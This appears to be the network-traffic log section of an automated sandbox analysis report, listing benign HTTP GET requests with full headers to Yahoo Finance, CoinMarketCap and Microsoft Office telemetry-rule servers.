Source: global trafficHTTP traffic detected: GET /static/img/coins/64x64/825.png HTTP/1.1Host: s2.coinmarketcap.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/chunks/stores.DPDRpTFd.js HTTP/1.1Host: finance.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/nodes/0.B28TE-jB.js HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://finance.yahoo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/nodes/2.ByyLg9CL.js HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://finance.yahoo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/chunks/PageProgressBar.BGwewH1i.js HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://finance.yahoo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /static/img/coins/64x64/1027.png HTTP/1.1Host: s2.coinmarketcap.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/chunks/ads.DhuB_mth.js HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://finance.yahoo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /static/img/coins/64x64/1.png HTTP/1.1Host: s2.coinmarketcap.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/img/coins/64x64/1839.png HTTP/1.1Host: s2.coinmarketcap.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/chunks/globals.D0QH3NT1.js HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://finance.yahoo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/chunks/loadQuoteType.mGEeGxqN.js HTTP/1.1Host: finance.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/chunks/quoteUtil.DBZgD1yl.js HTTP/1.1Host: finance.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/chunks/i13nUtil.C-uBpR7k.js HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://finance.yahoo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/chunks/logUtil.hOue7iAU.js HTTP/1.1Host: finance.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/chunks/index.g5YcAAdQ.js HTTP/1.1Host: finance.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/chunks/index.rV6zwFgL.js HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://finance.yahoo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/chunks/each.BExQfwb4.js HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://finance.yahoo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/chunks/spread.CgU5AtxT.js HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://finance.yahoo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/chunks/Ads.Bxzxpy-0.js HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://finance.yahoo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/chunks/index.DCSmZEjO.js HTTP/1.1Host: finance.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/chunks/AdGroup.CD4BTzLP.js HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://finance.yahoo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/nodes/0.B28TE-jB.js HTTP/1.1Host: finance.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/chunks/globals.D0QH3NT1.js HTTP/1.1Host: finance.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/chunks/intersectUtil.DVqOQxux.js HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://finance.yahoo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/chunks/ads.DhuB_mth.js HTTP/1.1Host: finance.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
